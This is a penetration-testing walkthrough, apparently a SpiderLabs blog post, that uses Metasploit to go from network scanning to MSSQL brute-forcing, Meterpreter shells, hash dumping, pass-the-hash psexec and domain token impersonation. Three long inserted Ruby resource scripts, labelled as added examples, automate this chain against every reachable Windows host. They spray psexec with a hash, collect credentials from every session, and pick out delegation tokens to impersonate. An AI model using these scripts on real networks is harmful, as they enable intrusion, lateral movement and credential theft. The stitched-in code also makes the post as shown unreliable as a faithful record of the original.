SpiderLabs Blog


Metasploit = tips, tricks, hashes and tokens

Metasploit is one of the many tools that can be used during a penetration test, and it is really a whole suite of tools that together form a complete attack framework. It is not the best tool for every job during a penetration test, but it definitely has its place and can be very handy when used appropriately.

For the purpose of this post I will walk through a scenario of steps that might be taken during a penetration test. I will deliberately use nothing but Metasploit, to demonstrate how much of the job it can cover.

It is not sensible to rely exclusively on your tools during a penetration test, as they are wrong from time to time.

It is good practice to verify your results and findings with a second tool where possible, and nothing beats manual verification: if a tool says anonymous FTP is allowed, the best check is to FTP to that host yourself and confirm it.

As an attack platform I will be using BackTrack 5 R2, which has Metasploit already installed. Just as important, it comes with a PostgreSQL database already set up, connected and ready to accept data.

The scope and target network for this penetration test scenario will be

So, let's start off with some basics…

Open msfconsole and check the database status with db_status:

[Screenshot: db_status output in msfconsole]

OK, so let's talk about workspaces. In Metasploit, workspaces are logical containers for data. You can have separate workspaces for different penetration tests, or for different locations within one test, and data can easily be imported into and exported from a workspace.

[Screenshot: the workspace command]

There are several tables storing the data inside a workspace: hosts, services, vulns, loot, notes and creds. Information can be added to these tables manually, for example adding a host to the hosts table:

[Screenshot: adding a host with hosts -a]

A service can also be added manually to the services table:

[Screenshot: adding a service with services -a]

To populate these tables automatically you can use db_nmap. You can also use your favourite scanning tool, export its results to an XML file, and import that file into the Metasploit database with db_import inside msfconsole; as you can see, the formats of many tools are supported:

[Screenshot: db_import usage, listing the supported formats]
Let's start with an nmap scan through db_nmap:

[Screenshot: db_nmap scan of the target range]

Looking at the hosts table, you can see it now contains the scan results:

[Screenshot: hosts table after the scan]

Looking at the services table, we can also restrict the output to only the columns we want to see (the services command accepts a list of columns to show):

[Screenshot: services table with selected columns]
Because we see so many Windows hosts, let's take a look at an auxiliary module, the SMB version scanner (auxiliary/scanner/smb/smb_version):

[Screenshot: smb_version module options]

The module needs a target, set with the set command, and RHOSTS wants a list of hosts. Typing them one by one is tedious, and this is one of the places where the Metasploit database comes in very handy: we take every host that has port 445 open from the services table and hand that list to the module as a file (RHOSTS accepts a file of addresses with the file: prefix):

[Screenshot: building the RHOSTS list from the services table]

After the scan is done we take a look at the services table again:

[Screenshot: services table with the smb_version results]

So we have Windows 2003 hosts, and only one of them has Service Pack 1 installed. We have the host names, and the domain name is "TEST".

From the names alone I would guess that TEST-EMEA-DC-01 is a domain controller and TEST-EMEA-DB-01 is a database server.

OK, let's look at the potential database server:

[Screenshot: services recorded for TEST-EMEA-DB-01]

One would assume MSSQL, because it is a Windows host, but by default that listens on TCP port 1433, which is not in the list. I am going to take a shot in the dark and run the MSSQL ping scanner (auxiliary/scanner/mssql/mssql_ping), which queries the SQL Server Browser service over UDP and reports the instances it knows about, whatever TCP port they use:

[Screenshot: mssql_ping module options]

Seems like we have a winner:

[Screenshot: mssql_ping output]

OK, there: it picked up an MSSQL instance, SQLEXPRESS, listening on TCP port 1043.

It reports version 9.00.4035.00, which according to the build number is Microsoft SQL Server 2005 SP3.

We peek into the services table to see what changed:

[Screenshot: services table after mssql_ping]

It added TCP port 1043 as mssql, and also UDP port 1434, the SQL Server Browser service, which is what gave away the real port of the instance.
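The two database-driven scans above, the SMB version scan over every host with port 445 open and the MSSQL ping that found an instance on a non-standard port, can be driven from one resource script. The following is an added example written for this post, not the author's script: it is the body of a `<ruby>` ... `</ruby>` block in a .rc file, run with `msfconsole -r recon.rc`. It goes one step beyond the post by running mssql_ping over every SMB host instead of one guessed host. The workspace name, scope and thread count are assumptions, the sample service rows are constructed, and the `framework.db.workspace.services` access is the part that only works inside msfconsole.

```ruby
# Body of a <ruby> ... </ruby> block in a Metasploit resource script (.rc).
# Added example for this post (not the author's script). Run as:
#   msfconsole -r recon.rc
# Assumed, not from the post: workspace name "test_emea", scope 10.0.0.0/24,
# THREADS 10. The framework.db and run_single calls only exist inside
# msfconsole; the helpers above the guard are plain Ruby so the selection
# logic can be run and checked on its own.

WORKSPACE = 'test_emea'   # assumed name
SCOPE     = '10.0.0.0/24' # assumed scope
THREADS   = 10

# Constructed rows in the shape of the workspace's services table (one hash
# per row). 10.0.0.5 looks like the "database" host of the post: SMB is open
# but nothing listens on TCP 1433.
SAMPLE_SERVICES = [
  { host: '10.0.0.20', port: 445,  proto: 'tcp', state: 'open'   },
  { host: '10.0.0.5',  port: 445,  proto: 'tcp', state: 'open'   },
  { host: '10.0.0.5',  port: 445,  proto: 'tcp', state: 'open'   }, # duplicate row
  { host: '10.0.0.7',  port: 445,  proto: 'tcp', state: 'closed' },
  { host: '10.0.0.9',  port: 1433, proto: 'tcp', state: 'open'   },
  { host: '10.0.0.9',  port: 445,  proto: 'tcp', state: 'open'   },
].freeze

# Commands that populate the database: db_nmap writes hosts and services
# straight into the current workspace; -sV records service names.
def recon_commands(workspace, scope)
  ["workspace -a #{workspace}", "db_nmap -sS -sV -Pn #{scope}"]
end

# Hosts with a given port open, deduplicated and sorted numerically, ready
# for a scanner's RHOSTS. Same selection the post makes when it feeds the
# port-445 hosts from the services table to smb_version.
def hosts_with_open_port(services, port, proto = 'tcp')
  services.select { |s| s[:port] == port && s[:proto] == proto && s[:state] == 'open' }
          .map { |s| s[:host] }
          .uniq
          .sort_by { |ip| ip.split('.').map(&:to_i) }
end

# Commands for one auxiliary scanner over a host list; empty list, no commands.
def scanner_commands(module_name, hosts, threads = THREADS)
  return [] if hosts.empty?
  ["use #{module_name}", "set RHOSTS #{hosts.join(' ')}", "set THREADS #{threads}", 'run']
end

# Scan plan for a set of service rows: smb_version on every SMB host, then
# mssql_ping on the same hosts. mssql_ping asks the SQL Server Browser
# service (UDP 1434) and reports instances on non-standard TCP ports, which
# is how a SQLEXPRESS instance on a port like 1043 shows up even though
# nothing listens on TCP 1433.
def scan_plan(services)
  smb_hosts = hosts_with_open_port(services, 445)
  scanner_commands('auxiliary/scanner/smb/smb_version', smb_hosts) +
    scanner_commands('auxiliary/scanner/mssql/mssql_ping', smb_hosts)
end

if defined?(framework) # true only inside msfconsole
  recon_commands(WORKSPACE, SCOPE).each { |c| run_single(c) }
  rows = framework.db.workspace.services.map do |s| # Mdm::Service rows (assumed API)
    { host: s.host.address, port: s.port, proto: s.proto, state: s.state }
  end
  scan_plan(rows).each { |c| run_single(c) }
  run_single('services -p 445,1433,1434') # review what the scanners added
end
```

Inside msfconsole, `run_single` executes each string exactly as if it had been typed at the msf prompt, so the script is just the console session from the post with the host list taken from the database instead of from a file.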

Now that we know there is a database running and on what port, we can brute-force the login, again with Metasploit (auxiliary/scanner/mssql/mssql_login):

[Screenshot: mssql_login module options]

We set the right RPORT and, with USER_AS_PASS, try the username as the password:

[Screenshot: RPORT and USER_AS_PASS set]

Then we run it and successfully find the password:

[Screenshot: mssql_login finding a valid login]

OK, we have the password, our first credential. So we take a look at the creds table:

[Screenshot: creds table with the MSSQL credential]

Exploit time:

[Screenshot: selecting the MSSQL exploit module]

We know the username, password and port:

[Screenshot: exploit options set]

Then we have a Meterpreter shell:

[Screenshot: Meterpreter session opened]

Background that session, then list the sessions, and we have one session:

[Screenshot: sessions -l showing one session]

Next I want to show you some post-exploitation modules.

We can use post/windows/gather/smart_hashdump to dump hashes. Set the SESSION and GETSYSTEM options:

[Screenshot: smart_hashdump options]

Then we run it:

[Screenshot: smart_hashdump output]

OK, so we have something in the loot table.

It obtained SYSTEM privileges and was able to get two hashes. The true administrator account appears to be "localadmin", since that is the one with RID 500 (the built-in account has been renamed); the account called "Administrator" is just a dummy account.

So we look at the loot table, because we haven't yet:

[Screenshot: loot table]

And at creds, where we already have three:

[Screenshot: creds table with three entries]
We need to test whether this local admin password is reused on the other systems, with the SMB login scanner (auxiliary/scanner/smb/smb_login).

We have everything we need:

[Screenshot: smb_login module options]

First we add the host list, from the services table:

[Screenshot: RHOSTS built from the services table]

We are not cracking the hash; we are simply passing it, so SMBPass is set to the LM:NTLM hash itself. We also set USER_AS_PASS to false and BLANK_PASSWORDS to false:

[Screenshot: SMBUser, SMBPass, USER_AS_PASS and BLANK_PASSWORDS set]

We see lots of successful logins when we run it:

[Screenshot: smb_login output with successful logins]

Loads more credentials found:

[Screenshot: creds table after smb_login]

So we have the local admin credential for a set of Windows systems. We can use the psexec exploit, but we would have to do it one host at a time: exploits have RHOST, not RHOSTS, so you can't give them a list. I want to show you another thing you can use for automation: resource scripts.

With the help of various sources on the Internet, I put together this script. It can easily be changed, and more modules can be added for it to step through:

[Screenshot: the psexec resource script]

For now it only does psexec.

We can't run the resource script yet: by default the payload is windows/meterpreter/reverse_tcp, and every run of the exploit would need its own handler on a listening port that is not already in use. So we use the windows/meterpreter/bind_tcp payload instead; the target listens and nothing has to be bound on our side (it does require that we can reach the bind port on the target, so a host firewall can get in the way):

[Screenshot: set PAYLOAD windows/meterpreter/bind_tcp]

Then we run the resource script:

[Screenshot: the resource script running psexec against each host]

We are left with nine sessions, all as the localadmin account:

[Screenshot: sessions -l showing nine sessions]
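A resource script of the kind described above, as an added example (not the script in the post's screenshot): the Ruby body of a .rc file that runs psexec once per SMB host with the dumped hash, as a background job, using bind_tcp as the post does and showing the per-host LPORT that reverse_tcp would need instead. The username is the post's localadmin; the hash is constructed (the LM:NT pair of an empty password, not a credential from the engagement), and the LHOST for the reverse variant is assumed.

```ruby
# Body of a <ruby> ... </ruby> block in a Metasploit resource script (.rc).
# Added example; not the resource script shown in the post. Run as:
#   msfconsole -r psexec_spray.rc
# Assumed, not from the post: LHOST 10.0.0.100 for the reverse variant, and
# the hash below, which is constructed (the well-known LM:NT pair for an
# empty password, not a credential from the engagement).

SMB_USER = 'localadmin'
SMB_HASH = 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# psexec (and smb_login) accept a hash in SMBPass only as LM:NT, two 32-hex
# halves. A stray space or a missing LM half just reads as a wrong password
# on every host, so check before spraying.
def valid_lm_nt_hash?(value)
  !!(value =~ /\A\h{32}:\h{32}\z/)
end

# Build the msfconsole commands for a pass-the-hash psexec run against each
# host. The exploit has RHOST, not RHOSTS, so it is one "exploit" per host,
# run as a background job (-j) without dropping into the session (-z).
# Payload choice, the point the post makes:
#   * bind_tcp (the default here): the target listens, nothing is bound on
#     the attacker side, so every run can use the same LPORT. Needs inbound
#     access to that port on the target.
#   * reverse_tcp: each concurrent job needs its own handler, and two
#     handlers cannot share a port, so LPORT is incremented per host.
def psexec_commands(hosts, opts = {})
  user      = opts.fetch(:user)
  ntlm_hash = opts.fetch(:ntlm_hash)
  payload   = opts.fetch(:payload, 'windows/meterpreter/bind_tcp')
  lport     = opts.fetch(:lport, 4444)
  raise ArgumentError, "SMBPass must be LM:NT hex, got #{ntlm_hash.inspect}" unless valid_lm_nt_hash?(ntlm_hash)
  return [] if hosts.empty?

  reverse = payload.include?('reverse')
  cmds = ['use exploit/windows/smb/psexec',
          "set PAYLOAD #{payload}",
          "set SMBUser #{user}",
          "set SMBPass #{ntlm_hash}"]
  cmds << "set LHOST #{opts.fetch(:lhost)}" if reverse # reverse payloads need our address
  hosts.each_with_index do |host, i|
    cmds << "set RHOST #{host}"
    cmds << "set LPORT #{reverse ? lport + i : lport}"
    cmds << 'exploit -j -z'
  end
  cmds
end

if defined?(framework) # true only inside msfconsole
  # The post sprays every host with SMB open; the services table of the
  # current workspace gives that list (Mdm::Service rows, assumed API).
  hosts = framework.db.workspace.services
                   .select { |s| s.port == 445 && s.proto == 'tcp' && s.state == 'open' }
                   .map { |s| s.host.address }.uniq
  psexec_commands(hosts, user: SMB_USER, ntlm_hash: SMB_HASH).each { |c| run_single(c) }
  run_single('sleep 10') # give the background jobs time to finish
  run_single('sessions -l')
end
```

A tighter host list is the set of addresses where smb_login actually succeeded with this hash (the creds table), rather than everything with port 445 open; the command builder does not care where the list comes from.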

Then we need to find some more hashes. Normally we would have to do that by hand again, interacting with every session and dumping the hashes.

Instead we can use the credential_collector post module (post/windows/gather/credentials/credential_collector). It gives us the hashes and, just as importantly, loads incognito and looks for domain tokens. But the module still has to be run manually, session by session, unless we use another resource file...

[Screenshot: resource file running credential_collector on each session]

It starts collecting hashes and tokens:

[Screenshot: credential_collector output]

Sessions 5 and 6 seem to have some interesting domain tokens:

[Screenshot: domain tokens listed for sessions 5 and 6]

We impersonate the token with incognito, and now we have domain-admin-level access:

[Screenshot: impersonate_token followed by getuid]
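The per-session credential collection and token hunt above, as an added example (not the post's resource file): the Ruby body of a .rc file that runs credential_collector on every Meterpreter session, then captures each session's incognito token listing to a spool file and filters it for TEST domain tokens, separating delegation tokens (usable against other hosts, such as a domain controller) from impersonation tokens (only good on the host that holds them). The domain and the module are from the post; the spool path, the use of `sessions -c ... -i` to run list_tokens inside a session, and the sample listing are assumptions or constructed.

```ruby
# Body of a <ruby> ... </ruby> block in a Metasploit resource script (.rc).
# Added example; not the post's resource file. Run as: msfconsole -r collect.rc
# From the post: the TEST domain and the credential_collector module.
# Assumed: the spool directory, "sessions -c <cmd> -i <id>" to run a
# Meterpreter command in one session, and the sample listing below, which
# is constructed in the shape of incognito's "list_tokens -u" output.

TARGET_DOMAIN = 'TEST'
SPOOL_DIR     = '/tmp' # assumed

SAMPLE_LISTING = <<~'TXT'
  [*] Session 5 (10.0.0.5)
  Delegation Tokens Available
  ========================================
  NT AUTHORITY\LOCAL SERVICE
  NT AUTHORITY\SYSTEM
  TEST\svc_backup
  TEST\Administrator

  Impersonation Tokens Available
  ========================================
  TEST\jsmith
  OTHERDOM\helpdesk
TXT

# credential_collector on each session: dumps the hashes and lists the
# tokens, and records both in the database, so no session has to be
# interacted with by hand. It also leaves incognito loaded in the session.
def collector_commands(session_ids)
  session_ids.flat_map do |id|
    ['use post/windows/gather/credentials/credential_collector', "set SESSION #{id}", 'run']
  end
end

# Pull the DOMAIN\user tokens of one domain out of list_tokens -u output.
# Delegation tokens are the ones worth stealing: they can authenticate to
# other hosts; impersonation tokens only work locally. Lines outside either
# section (banners, NT AUTHORITY\..., other domains) are ignored.
def domain_tokens(text, domain)
  found = { delegation: [], impersonation: [] }
  section = nil
  text.each_line do |raw|
    line = raw.strip
    if line =~ /\ADelegation Tokens Available/i
      section = :delegation
    elsif line =~ /\AImpersonation Tokens Available/i
      section = :impersonation
    elsif section && line =~ %r{\A([^\\\s]+)\\(\S+)\z} && $1.casecmp(domain).zero?
      found[section] << line unless found[section].include?(line)
    end
  end
  found
end

# Meterpreter commands to take a token inside the session that holds it.
# incognito wants the backslash doubled on its command line.
def impersonation_commands(token)
  ['load incognito', "impersonate_token #{token.split('\\').join('\\\\')}", 'getuid']
end

if defined?(framework) # true only inside msfconsole
  ids = framework.sessions.keys.select { |id| framework.sessions[id].type == 'meterpreter' }
  collector_commands(ids).each { |c| run_single(c) }
  ids.each do |id|
    log = "#{SPOOL_DIR}/tokens_#{id}.log"
    run_single("spool #{log}")                              # capture console output
    run_single("sessions -c \"list_tokens -u\" -i #{id}")   # incognito already loaded by the collector
    run_single('spool off')
    domain_tokens(File.read(log), TARGET_DOMAIN)[:delegation].each do |t|
      puts "session #{id}: delegation token #{t} -> #{impersonation_commands(t).join(' ; ')}"
    end
  end
end
```

Spooling one file per session keeps the attribution simple: a delegation token for the domain found in the log of session 5 has to be impersonated from session 5, which is exactly the manual step the post ends with.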

This concludes the demonstration of Metasploit and some of the components within it.

Happy Metasploiting…